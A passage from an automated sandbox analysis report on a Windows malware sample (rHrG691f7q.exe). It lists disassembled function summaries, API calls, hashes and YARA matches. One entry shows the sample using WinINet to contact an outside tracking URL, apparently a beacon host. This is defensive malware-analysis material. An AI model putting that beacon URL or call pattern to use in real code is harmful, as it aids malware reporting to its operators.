• API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
• String ID:
• API String ID: 2395760641-0
• Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
• Instruction ID: de9c2bc6a11be69392f590823a0bfb6d92b63c10ce212484ea812e8f40420d8f
• Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
• Instruction Fuzzy Hash: 48219A79814204AFDB91EFA9C4847DDB7B1BF50725F60805FE085AB280DBB49544CF95
APIs
• GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
• _free.LIBCMT ref: 00431F98
• _free.LIBCMT ref: 00431FBF
• SetLastError.KERNEL32(00000000), ref: 00431FCC
• SetLastError.KERNEL32(00000000), ref: 00431FD5
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
• Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
• Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
• Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
APIs
• GetLastError.KERNEL32(024CDAD7,024CDAD7,00000002,024EED35,024F3951,00000000,?,024E6A05,00000002,00000000,00000000,00000000,?,024CCF88,024CDAD7,00000004), ref: 024F21CA
• _free.LIBCMT ref: 024F21FF
• _free.LIBCMT ref: 024F2226
• SetLastError.KERNEL32(00000000,?,024CDAD7), ref: 024F2233
• SetLastError.KERNEL32(00000000,?,024CDAD7), ref: 024F223C
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
• Instruction ID: 67eb15a8c27e797031767cf46085695d9e825339a492581aabc2770ac0c88d8e
• Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
• Instruction Fuzzy Hash: 7F01F936245B017BD392AB355C44E1B262EABC1B72712013FFF15A6391EFF08802852A
APIs
• GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
• _free.LIBCMT ref: 00431F11
• _free.LIBCMT ref: 00431F39
• SetLastError.KERNEL32(00000000), ref: 00431F46
• SetLastError.KERNEL32(00000000), ref: 00431F52
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
• Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
• Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
• Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
APIs
• GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
• _free.LIBCMT ref: 024F2178
• _free.LIBCMT ref: 024F21A0
• SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
• SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
• Instruction ID: 9a3c51a60d06f16650d1caf8f9120340b81595b8a69831e9c2debcad55390e09
• Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
• Instruction Fuzzy Hash: 4DF0A93554560137D3976735AD08B5B3A2A5BC2F72F15012BFF19923D0EFE58502852D
APIs
  • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
• Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
  • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
  • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
• Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                    • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024D29A4: TlsGetValue.KERNEL32(?,?,024D0DC2,024D2ECF,00000000,?,024D0DA0,?,?,?,00000000,?,00000000), ref: 024D29AA
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024D7BB1
                                                                                                                                                                                                                                                                      • Part of subcall function 024E121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024E1241
                                                                                                                                                                                                                                                                      • Part of subcall function 024E121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024E125A
                                                                                                                                                                                                                                                                      • Part of subcall function 024E121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024E12D0
                                                                                                                                                                                                                                                                      • Part of subcall function 024E121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024E12D8
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024D7BBF
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024D7BC9
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024D7BD3
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024D7BF1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                    • Instruction ID: 867b4cbcb40bb9fef121233d3b941c9342489eeb9237402ea33e71104e5b057d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F0CD31A002186BCE15F6B6883096EF66B9F90B18B00426FD81193350EF759E058E92
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                    • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA0C4
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA0D6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA0E8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA0FA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA10C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                    • Instruction ID: e340d9007967ed4bd606896aeee9c1a880dc97dc3131bbcc651501c383917ea9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF06232505220ABC6F0EF55F9C6C0777DAAA84750764495BF20CD7F11CB71F8908E59
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431748
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043175A
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043176D
• _free.LIBCMT ref: 0043177E
• _free.LIBCMT ref: 0043178F
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
• Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
APIs
• Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
• Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
• GetCurrentThread.KERNEL32 ref: 0041CD09
• Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
• Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
• String ID:
• API String ID: 2583373041-0
• Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
• Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
APIs
• _free.LIBCMT ref: 024F19AF
  • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
  • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
• _free.LIBCMT ref: 024F19C1
• _free.LIBCMT ref: 024F19D4
• _free.LIBCMT ref: 024F19E5
• _free.LIBCMT ref: 024F19F6
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction ID: 6869a7c4f8497a9b7b8f534d9fe8f1c4dbe1c2d9472886b302d88895b5fc6f58
• Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction Fuzzy Hash: 4DF01D70D003519BEFA16F15AC808053F61AF49B2270002ABF506977B2C774E962DF8E
APIs
• Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024DCF36
• Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024DCF67
• GetCurrentThread.KERNEL32 ref: 024DCF70
• Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024DCF83
• Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024DCF8C
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
• String ID:
• API String ID: 2583373041-0
• Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction ID: b16b1bd0d0456a332b3d340756669b31de222dd3f2c3c1c1776490674a3bfd15
• Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction Fuzzy Hash: D7F03037200900DBC625EF62EAB09BBB7B6AFC4610311455FE58B47690CF21A947DF62
APIs
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024C2E8E
  • Part of subcall function 024C1321: _wcslen.LIBCMT ref: 024C1328
  • Part of subcall function 024C1321: _wcslen.LIBCMT ref: 024C1344
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024C30A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: InternetOpen_wcslen
• String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3381584094-4083784958
• Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
• Instruction ID: f05beb3b11f4c0e47bf741c133908e9299e3723d66f157796b0292566a97524b
• Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
• Instruction Fuzzy Hash: 6E515195E55344A8E320EFB0BC45B722378EF58712F10643BD518CB2B2E7A19984875E
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 024E896A
• __IsNonwritableInCurrentImage.LIBCMT ref: 024E8A23
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: CurrentImageNonwritable___except_validate_context_record
• String ID: fB$csm
• API String ID: 3480331319-1586063737
• Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction ID: 2b22da791d5a1038650e9ea005772fa76e1e40a14662d232c12186aae9164693
• Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction Fuzzy Hash: 85410A30E00248DBDF10DF29C884AAE7BB5BF45329F14819BD9165B3A1D732D905CF91
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rHrG691f7q.exe,00000104), ref: 0042F753
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0042F81E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0042F828
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                    • API String ID: 2506810119-1060384687
                                                                                                                                                                                                                                                                    • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                    • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rHrG691f7q.exe,00000104), ref: 024EF9BA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024EFA85
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024EFA8F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\rHrG691f7q.exe
                                                                                                                                                                                                                                                                    • API String ID: 2506810119-1060384687
                                                                                                                                                                                                                                                                    • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                    • Instruction ID: eed9d8da3458f827b679989f76b2a02d92141da3ab53bd442370fc2d1ad8dee6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF319171A00258EFEF21DF95DC80D9EBBFCEF89711B1140ABE8069B611D7709A44CB90
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024CC8DE
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                    • Instruction ID: 4252017ded8726e170fee71175b1785dce1c3a3aaddb5bbf7a51625ffce3b299
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F08B728042086ACB80E55CCD81BEB33989B01302F24802FDD0AAB182EB689946CBB0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                    • String ID: F(@
                                                                                                                                                                                                                                                                    • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                    • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                    • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                    • String ID: F(@
                                                                                                                                                                                                                                                                    • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                    • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                    • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
